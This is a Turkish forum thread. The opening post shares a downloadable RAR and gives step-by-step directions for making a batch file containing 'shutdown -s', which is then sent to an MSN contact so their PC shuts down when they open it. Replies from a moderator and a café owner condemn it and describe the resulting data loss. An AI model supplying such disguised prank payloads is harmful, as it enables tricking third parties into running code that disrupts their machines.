bu programla msndeki kişinin pc sini kapatabilirrsiniz.

LİNK:http://rapidshare.com/files/61368910/w.rar

1KB KB DOSYA

ANLATIM
indirdiğiniz dosyayı açmayın rar lı bir şekilde kalsın yoksa senin pc kapanır nese bu dosyayı rar lı bir şekilde karşıdakine gönder karşıdaki rarı açsın sonra rarın içindeki proyu açsın pc si kapanır

DİĞER YOL:

bu yolla yukardaki dosyayı indirmenize gerek yok o dosyayı kendiniz yapcanız işte böle

1:not defterini açın
2:shutdown -s bunu yazın
3:dosyayı bat dosyası olarak kaydedin
4:dosyayı rar lı hale getirin ve karşı tarafa gönderin

BAT DOSYASI NASI YAPILIR
not defterine yazdıktan sonra farklı kaydet diin ve doya adına xxx.bat yazın. (xxx yerine istediğinizi yazın

dikkat !!!
dosyayı indirin ce virüs bulabilir ama önemli değil yeminederim istiyosanız indirmeyip kendinizde yapabilirsiniz

Kötü amaçlı paylaşımlar yapmayın lütfen.
Bunun gibi bazı kodları wordpada girip bat uzantısı yapıp karşıya atıldıgında karşıdakinin bu basit word belgesini açması durumunda bilgisayarının çökmesi bile mümkün.Ama tabi onun kodları farklı.Fakat bu tarz işlemler sadece karşıdakine zarar verir bu yüzden bu tarz paylaşımlar yapmayın lütfen.
Kilitlenmiştir.

ben bunu kötü amaç la vermedim sadece karşıdakine şaka yapmak amacıyla verdim ve ayrıca bunlada pc çökmez ok. sonra bu gibi başka programlarla pc çöker demişin bu senin dediiğin program değil bilgisayar falan da çökertmez .ayrıca bilgisayarı 1 anda değil yawaş yawaş kapatıyo (başlat bilgisayarı kapat derken nası kapatıyosan öle kapatıyo tammmmm Evil or Very Mad

AYRICA DOSYAYI DENEMEDEN DE YORUM YAMAAAAA Exclamation Mad

şöyle örnek verıyım ben kafecıyım bı kısı benım pc mı dırek kapattıgı zaman kafe programım % 80 çöker butun bılgılerım gıder hesaplar falan öncekı gun cırolarım falan kafe programını sıfırdan kur programcıyı ara key al öf bı suru ıs yanı sınır bı program zannımca saka yapcam derken ters bı tepkı almayın

Yukarı Alt